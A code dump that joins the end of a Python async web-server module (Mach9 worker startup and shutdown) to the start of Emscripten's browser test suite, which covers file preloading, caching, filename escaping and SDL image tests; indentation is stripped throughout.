self.trigger_events(after_start, loop)
# Register signals for graceful termination
for _signal in (SIGINT, SIGTERM):
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
log.warning('Mach9 tried to use loop.add_signal_handler but it is'
' not implemented on this platform.')
pid = os.getpid()
try:
log.info('Starting worker [{}]'.format(pid))
loop.run_forever()
finally:
log.info("Stopping worker [{}]".format(pid))
# Run the on_stop function if provided
self.trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
while connections:
loop.run_until_complete(asyncio.sleep(0.1))
self.trigger_events(after_stop, loop)
loop.close()
def serve_multiple(self, server_settings, workers):
server_settings['reuse_port'] = True
# Handling when custom socket is not provided.
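# Each worker process inherits this single pre-bound socket
# (SO_REUSEADDR + set_inheritable), so the kernel distributes accepted
# connections across the workers.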
if server_settings.get('sock') is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings['host'], server_settings['port']))
sock.set_inheritable(True)
server_settings['sock'] = sock
server_settings['host'] = None
server_settings['port'] = None
log = server_settings['log']
def sig_handler(signal, frame):
log.info("Received signal {}. Shutting down.".format(
Signals(signal).name))
for process in processes:
os.kill(process.pid, SIGINT)
signal_func(SIGINT, sig_handler)
signal_func(SIGTERM, sig_handler)
processes = []
for _ in range(workers):
process = Process(target=self.serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get('sock').close()
def stop(self):
self.loop.stop()
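# Minimal usage sketch (assumes a mach9 app object exposing the attributes
# read in __init__ above; not part of the original module):
#   server = Server(app)
#   server.run(host='0.0.0.0', port=8000, workers=2)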
|
test_browser.py | # coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_wasm_backend, flaky
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
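# Parse a Range header of the form "bytes=start-end", clamp end to the
# data size, and reply with only that slice plus a matching Content-Length.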
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_threads = unittest.skipIf(os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'), "This test requires thread support")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future;
# remove this test once system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'], cwd=self.get_dir())
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
run_process([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
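# e.g. a file literally named some@file.txt is passed as --preload-file some@@file.txt (see the 'some@@' cases above).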
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except OSError:
pass
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except OSError:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
run_process([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 50 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''' + ('_' * extra_size))
print(os.path.getsize('somefile.txt'))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')])
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file runs xhr.onload with a status other than 200, 304 or 206
setup("")
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
